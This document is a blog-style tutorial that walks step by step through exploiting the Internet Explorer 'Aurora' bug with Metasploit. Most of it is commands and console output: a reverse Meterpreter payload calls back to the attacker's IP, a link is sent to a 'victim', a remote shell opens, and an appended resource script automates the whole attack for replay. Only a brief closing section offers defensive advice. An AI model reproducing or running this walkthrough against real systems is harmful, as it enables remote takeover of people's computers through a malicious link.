I think everyone has heard of the IE 0-day that has been so talked about recently: through a memory corruption bug in the browser (the post calls it a BOF) it lets an attacker inject arbitrary code and obtain a shell. Not every configuration is vulnerable, though. Below is a small table showing how the different Windows versions fare together with their IE version, and now that antivirus detects it, let's see how it is exploited..
[Image: table of Windows versions against IE versions; source: http://elladodelmal.blogspot.com/]
The lab consists of a virtual machine (VirtualBox; in the next post I will explain how to install it, with a bonus Hacking section!) on which I installed Windows XP SP3 with Internet Explorer 6.0, which is completely vulnerable. Fortunately it is quite rare to find users still browsing with that version, but.... :). Heh..
First you need Metasploit. You can download it from here; there are 32-bit and 64-bit Linux builds (I downloaded framework-3.3.3-linux-x86_64.run). There is also a Windows build, but the last one I tried did not include the Aurora exploit. It can be added by downloading the module's .rb file and placing it in the exploits/windows/browser folder, which is the cleanest option; the exploit module itself is here. Once Metasploit is installed and everything has gone well (on Linux you need to install Ruby), open the Metasploit console.
/home/user# msfconsole

+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
       =[ svn r8438 updated yesterday (2010.02.09)

msf >
msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
Once the exploit is loaded with the use command, show options lists the arguments it needs in order to run. For the payload we will use a reverse shell (Meterpreter over reverse TCP), set as follows.
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Now we fill in the arguments of both the payload and the exploit. LHOST is the attacker's IP, the one the victim's machine will connect back to; URIPATH is set to / so the link we send is just the server root.

msf exploit(ie_aurora) > set LHOST 190.18x.xx.xxx
LHOST => 190.18x.xx.xxx
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     190.18x.xx.xxx   yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
The screen now shows the values we set; LHOST is the attacker's IP. Launch the exploit:
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 190.18x.xx.xxx:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://190.18x.xx.xxx:8080/
[*] Server started.
msf exploit(ie_aurora) >

The web server is now running on the LHOST IP on port 8080, and the handler for the reverse shell is listening on port 4444 :).
Now send the link (http://190.18x.xx.xxx:8080/) to the victim and wait for them to open it.
Let's look at our Metasploit console :)

[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 190.18x.xx.xxx
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513)
msf exploit(ie_aurora) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  190.18x.xx.xxx:4444 -> 190.18x.xx.xxx:51513

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
We can see that we have a session with the victim, who is running Windows XP SP3. Now for the best part, a remote shell :)
meterpreter > shell
Process 812 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victima 10\Escritorio> hostname
hostname
victima

C:\Documents and Settings\Victima 10\Escritorio>
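The whole procedure above, collected into a Metasploit resource script so that it can be replayed with a single msfconsole -r invocation instead of typing each set command by hand. This is an added example, not part of the original post or of the ie_aurora module; the file name aurora.rc is a placeholder and the LHOST value is the post's own redacted address, to be replaced with the real attacker IP. Comments are kept on their own lines because msfconsole's set command would otherwise take a trailing comment as part of the value.

```text
# aurora.rc  (placeholder file name; added example, not from the original post)
# Run with:  msfconsole -r aurora.rc
# Replays the steps shown above: load the module, choose the reverse
# Meterpreter payload, point the handler at the attacker's IP, serve the
# exploit on / instead of a random URI, and start the server as a job.
use windows/browser/ie_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
# attacker IP the victim will connect back to (placeholder, replace it)
set LHOST 190.18x.xx.xxx
# handler port for the reverse shell, the default made explicit
set LPORT 4444
# HTTP side: listen on every interface, port 8080, at the server root,
# so the link to send to the victim is simply http://<LHOST>:8080/
set SRVHOST 0.0.0.0
set SRVPORT 8080
set URIPATH /
# run as a background job so the prompt stays free for sessions -l / sessions -i 1
exploit -j
```

After the script finishes, the console is left at the msf exploit(ie_aurora) > prompt with the server and handler running; once the victim opens the link, sessions -l and sessions -i 1 work exactly as shown above.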
Solution
Browsing with an antivirus is the best defence against this exploit; NOD32 detects it and does not let it inject. Also, do not use an outdated IE such as 6.x, which is what this PoC was done with. While things like this keep happening, stop using the defective software until the company that owns it releases the patch for it; for every program there is always another one that does the same job, so choose that one temporarily.
References:
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html

Greetings